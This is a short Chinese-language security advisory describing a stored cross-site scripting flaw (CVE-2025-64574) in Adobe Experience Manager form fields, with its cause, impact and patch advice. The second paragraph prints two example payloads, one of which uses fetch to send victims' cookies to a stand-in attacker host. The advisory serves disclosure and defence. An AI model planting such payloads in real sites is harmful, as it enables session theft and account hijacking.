CVE-2025-64574CVE-2025-64574是Adobe Experience Manager中的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用该漏洞可以通过低权限账户在受影响的表单字段中注入恶意JavaScript脚本。由于是存储型XSS,恶意脚本会被永久保存在服务器端,当其他用户浏览包含该漏洞字段的页面时,恶意代码会在其浏览器中自动执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。由于漏洞需要用户交互才能触发,攻击复杂度相对较高,但仍对使用受影响版本Adobe Experience Manager的组织构成安全风险。建议受影响的用户尽快升级到Adobe官方发布的安全补丁版本。
该存储型XSS漏洞存在于Adobe Experience Manager的表单处理组件中。漏洞的根本原因在于应用程序在处理用户输入时未对特殊字符进行充分的HTML实体编码。攻击者(拥有低权限账户)可以在表单输入字段中嵌入恶意JavaScript代码,如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。这些恶意载荷会被存储在服务器数据库中,当其他合法用户访问包含该表单字段的页面时,服务器会从数据库中检索并显示这些未经过滤的内容,导致恶意脚本在用户浏览器上下文中执行。由于Adobe Experience Manager通常用于企业级内容管理,攻击成功后攻击者可以获取管理员凭证、访问敏感企业数据或进一步横向移动到其他系统。攻击成功的前提是受害者需要访问包含恶意内容的页面,这通常通过社会工程学手段诱导用户访问特定URL实现。